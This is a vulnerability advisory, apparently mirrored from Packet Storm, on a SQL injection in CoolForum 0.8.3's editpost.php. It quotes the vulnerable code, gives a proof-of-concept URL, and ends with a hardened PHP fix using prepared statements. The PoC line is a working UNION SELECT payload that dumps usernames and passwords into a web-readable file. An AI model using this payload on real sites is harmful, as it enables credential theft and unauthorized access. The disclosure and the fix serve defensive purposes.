coolforum083.txt

Date: 05 Jun 2006 | Reported by: DarkFig | Type: packetstorm | Source: packetstormsecurity.com

Critical SQL Injection vulnerability in CoolForum 0.8.3 allows unauthorized data access.


Code
`Type: SQL Injection  
Risk: Critical  
Product: CoolForum <= 0.8.3 beta  
********************************  
  
  
Vulnerability  
*************  
// File: editpost.php  
// Line 38  
//  
if(isset($_REQUEST['post'])) $post = intval($_REQUEST['post']);  
else $post = 0;  
--  
// Line 77  
//  
$canedit = getrightedit($_REQUEST['post'],$_REQUEST['forumid']);  
--  
// File: admin/functions.php  
// Line 623  
//  
function getrightedit($idpost,$forumid)  
{  
global $_MODORIGHTS, $sql, $_USER, $_FORUMCFG, $_PRE, $_GENERAL, $_PERMFORUM;  
$query = $sql->query("SELECT idforum,idmembre,parent FROM ".$_PRE."posts WHERE idpost=".$idpost);  
$j = mysql_fetch_array($query);  
--  
  
  
Proof Of Concept  
****************  
http://[...]/editpost.php?forumid=1&post=3 UNION SELECT userid,login,password FROM cf_user INTO OUTFILE '/www/web/resultat.txt'%23&parent=1&p=1  
  
  
Credits  
*******  
Ref : http://mgsdl.free.fr/advisories/coolforum083ba.txt  
Note: Other SQL injections exist but they are difficult to exploit  
by DarkFig  
`
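The excerpt shows the root cause: line 38 of editpost.php casts `post` with `intval()`, but line 77 passes the raw `$_REQUEST['post']` to `getrightedit()`, which concatenates it into the query. The smallest fix is to pass the already-cast `$post`; the hardened form below is an added example, not CoolForum's code, and it assumes PDO in place of the forum's `$sql` wrapper, an in-memory SQLite table with an assumed `cf_` prefix standing in for the posts table, and hypothetical function names.

```php
<?php
// Added example: hardened counterpart of getrightedit() from the advisory.
// Assumptions: PDO replaces the forum's $sql wrapper; an in-memory SQLite
// table stands in for the posts table; function names are hypothetical.

function parse_post_id($raw): ?int
{
    // Accept only a positive decimal integer; anything with trailing text fails.
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

function getrightedit_hardened(PDO $db, string $prefix, $rawPost): ?array
{
    $idpost = parse_post_id($rawPost);
    if ($idpost === null) {
        return null; // caller should return an error instead of querying
    }
    // $prefix comes from trusted configuration, never from the request.
    // The id is a bound parameter, so it never becomes part of the SQL text.
    $stmt = $db->prepare(
        "SELECT idforum, idmembre, parent FROM {$prefix}posts WHERE idpost = :id"
    );
    $stmt->bindValue(':id', $idpost, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed sample data (not taken from a real forum database).
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE cf_posts (idpost INTEGER PRIMARY KEY, idforum INT, idmembre INT, parent INT)');
$db->exec('INSERT INTO cf_posts VALUES (3, 1, 42, 1)');

// Constructed inputs: a valid id, then ids with extra text appended.
foreach (['3', '3 UNION SELECT 1,2,3', '-1', '3abc'] as $raw) {
    $row = getrightedit_hardened($db, 'cf_', $raw);
    printf("%-26s => %s\n", var_export($raw, true), $row ? json_encode($row) : 'rejected');
}
```

Only the first input reaches the database; the other three are rejected before any query is built.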

Vulners AI Score: 7.4 (High risk)